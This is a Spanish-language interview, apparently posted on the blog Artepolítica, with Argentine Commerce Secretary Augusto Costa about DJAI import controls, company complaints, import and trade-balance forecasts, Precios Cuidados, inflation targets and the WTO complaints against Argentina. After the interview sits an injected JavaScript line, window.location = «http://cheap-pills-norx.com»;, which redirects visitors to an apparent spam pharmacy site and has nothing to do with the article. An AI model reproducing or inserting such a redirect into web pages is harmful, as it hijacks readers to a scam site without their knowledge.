Costa: «El Gobierno no tendrá metas de inflación con métodos ortodoxos»

Lo dice el Secretario de Comercio Augusto Costa. Defendió sistema para importar pero admite que hay 300 reclamos
El secretario de Comercio, Augusto Costa, salió a defender la administración de los pedidos de importación que recibe de las empresas. En una entrevista mantenida con Ámbito Financiero vaticina que en 2014, «habrá un crecimiento de las importaciones similar al del año pasado», pero reconoce que «hay una reducción, los autos cayeron, los electrónicos; en algunos casos hubo caídas por menor producción, y en otros porque hubo una maduración de la política de sustitución de importaciones». Anticipa que se conocerá el primer informe de la OMC sobre las demandas presentadas por Estados Unidos, Japón y la Unión Europea por las DJAI. «El sistema es perfectible y, si el informe del Panel hace recomendaciones razonables, se verá…».
Periodista: ¿Cómo está la situación hoy de las DJAI (Declaración Jurada Anticipada de Importación)? Hay muchos reclamos de empresas.
Augusto Costa: Cuando asumimos en la Secretaría hubo un aluvión de DJAI, casi 20 mil presentaciones por día. Nuestra primera acción fue eliminar el contacto telefónico y por mail ante las situaciones de reclamos, porque eran inmanejables. Mientras analizábamos los pedidos, convocamos a las cámaras sectoriales para trasmitirles que les digan a sus asociados que si seguían presentando DJAI duplicadas iba a ser peor. Entre la informatización y el mensaje que transmitimos logramos evitar situaciones que afectaran procesos productivos y se llegó a que hoy tengamos unos 300 reclamos de las empresas de 2.000 mails que teníamos antes, y de DJAI hoy estamos en 8.000 a 9.000 por día, cifra que es más razonable y manejable.
P.: ¿Considera que esta cifra de DJAI se puede reducir aún más?
A.C.: Todavía creemos que hay una duplicación, que debería bajar a unas 6.000
-una cifra razonable- y estimo que pronto llegaremos a ese nivel.
P.: Entre importadores se señala que las mayores quejas por las demoras son de pymes. ¿Es así?
A.C.: La situación es totalmente a la inversa. Si una pyme solicita una DJAI y, en base a su conducta importadora previa, su solicitud es razonable, se autoriza. El promedio de aprobaciones es superior en las pymes respecto de las grandes empresas.
P.: ¿Qué ocurre con las empresas medianas y grandes?
A.C.: La metodología que estamos aplicando no es un capricho ni una actitud arbitraria, sino que tiene que ver con la administración del comercio. Mediante las DJAI, lo que buscamos es darle consistencia al comercio exterior con la política económica, con generar los incentivos para que se invierta en el país, para que se sustituyan importaciones, se genere empleo, producción, precios y abastecimiento.
P.: ¿Y cómo lo resuelve?
A.C.: Como el grueso de las importaciones están en las medianas y grandes empresas, con ellas tenemos políticas sectoriales orientadas a definir pautas y evaluar qué ocurre, la dinámica de cada uno de los sectores para ver la proyección esperada de necesidades de importación. Nos empezamos a juntar sector por sector con las cámaras, y empresa por empresa con directivos para que nos presenten sus planes de producción, de inversión, de requerimiento de divisas, de importaciones y exportaciones. Con todos esos datos lo que hacemos es acordar una pauta con los importadores. Nosotros tenemos que tener previsibilidad respecto de todas las empresas demandantes de divisas, cuánto van a exportar para tener un flujo de entrada y salida, cuánto empleo van a generar, etcétera.
P.: ¿Cómo se la piden?
A.C.: Presentando una planilla Excel con todas sus proyecciones. De esta manera, sumo todas las proyecciones de las empresas y tengo una perspectiva del año. A las empresas les contesto que, en función de sus expectativas, la Secretaría les pueda dar la previsibilidad que, si está dentro de esa pauta, no va a tener ningún problema para importar. Hay situaciones que se nos pueden escapar y es ahí que la empresa puede recurrir al formulario de reclamo y, si no obtiene respuesta, insistir a través de las cámaras sectoriales y/u organismos públicos.
P.: ¿Qué hacen con estos reclamos?
A.C.: Los leemos primero y analizamos el caso para no correr el riesgo de estar generando una situación no deseada en materia productiva. En promedio hay unos 300 reclamos.
P.: ¿Se está pensando en algún nuevo sistema para la administración de las importaciones?
A.C.: No, de ninguna manera.
P.: ¿Es cierto que a las empresas se les está pidiendo que para importar deben conseguir los dólares del exterior?
A.C.: No. Le repito, podemos pedir -si está dentro de las posibilidades de las empresas – que extiendan los plazos de financiamiento.
P.: En función de la menor actividad…, ¿disminuyeron los pedidos de importación?
A.C. Esperamos para este año un crecimiento similar al del año pasado. Somos bastante optimistas respecto de las condiciones de la economía para el segundo semestre. En materia de demanda de importaciones, obviamente, hay una reducción, los autos cayeron, los electrónicos. En algunos casos hubo caídas por menor producción, y en otros porque hubo una maduración de la política de sustitución de importaciones. Esperamos un volumen de importaciones similar al del año pasado, 74 mil millones de dólares.
P.: ¿Y la balanza comercial?
A.C.: La balanza comercial dependerá de cómo respondan las exportaciones. Tenemos buenos precios, una buena cosecha y una mejor relación cambiaria que debería generar un repunte de algunas exportaciones que venían disminuyendo.También tenemos un mundo con un Brasil que está creciendo menos que el año pasado, con Europa creciendo poco y encima la Argentina perdió la preferencia arancelaría de gran parte de los productos que exportaba a Europa. Por otro lado, hoy tenemos cerrado el mercado de las exportaciones de biodiésel a Europa.
P.: ¿Cómo evalúa el desempeño de Tierra del Fuego?
A.C.: Estamos trabajando con AFARTE (Asociación de Fábricas Argentinas Terminales de Electrónica) para lograr mayor integración nacional de los bienes que se fabrican en la isla. Sabemos que en algún tipo de productos es más fácil que en otros, por ejemplo, en aires acondicionados es más fácil que en celulares.
P.: ¿Cuántas citaciones, sanciones y reclamos han enviado a las empresas?
A.C: La secretaría solicita información en el marco de sus competencias a múltiples sectores y empresas para tener información de precios y abastecimiento. ¿Qué cuestionan las empresas? Las resolución 29, que solicita que presenten su lista de precios una vez por mes. Este pedido sólo se les hizo a las empresas grandes, no a las pymes. En algunos casos necesitamos conocer las bonificaciones que aplican y las empresas argumentan que esto es un strip tease comercial y que es confidencial. Mi respuesta es que este argumento es similar a que le respondan a la AFIP: no puedo presentar mi declaración de impuestos porque la pueden difundir. Cuando se me presenta información queda bajo la órbita de Comercio.
P.: ¿Queda para analizar en la próxima revisión el impacto de la quita de subsidios de energía a comercios y el aumento salarial?
A.C.: Sí, correcto. En junio nos sentaremos a ver cuánto impactan.
P.: ¿Precios Cuidados es la herramienta principal para reducir la inflación?
A.C.: La inflación es un fenómeno complejo y multicausal. La política macroeconómica del gobierno (fiscal, monetaria, cambiaria, de ingresos, precios y comercio) son diferentes instrumentos que permiten llevar adelante, en última instancia, determinados objetivos. Argentina no tiene metas de inflación como otros países, sino metas de crecimiento y empleo. No va a tener este gobierno metas de inflación con los métodos ortodoxos tradicionales. Cuando lanzamos Precios Cuidados nuestro objetivo era dar precios de referencia. Veo buenas perspectivas para el próximo semestre. Nosotros creemos que las variables se están ordenando como para que la economía pueda crecer razonablemente bien este año y dentro de una pauta de precios consistente con ese objetivo.
P.: ¿Cómo está la situación de las demandas de la OMC?, ¿se va a continuar con las DJAI en caso de un fallo adverso?
A.C.: Estados Unidos, Japón y la Unión Europea – países que tienen una actitud proteccionista innegable – son los que llevaron el tema ante la OMC. Acá aparece la primera hipocresía, que ellos lleven estos paneles. Hemos cumplido con los pasos formales. En un mes estará el primer informe. Para nosotros las DJAIs son un instrumento de gestión de riesgo aduanero y esto está contemplado dentro de lo que son las recomendaciones de la Organización Mundial de la Aduanas, que considera que los países tengan sistemas de presentación adelantada de información. Por supuesto que el sistema es perfectible y, si el informe del Panel hace recomendaciones razonables, se verá.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *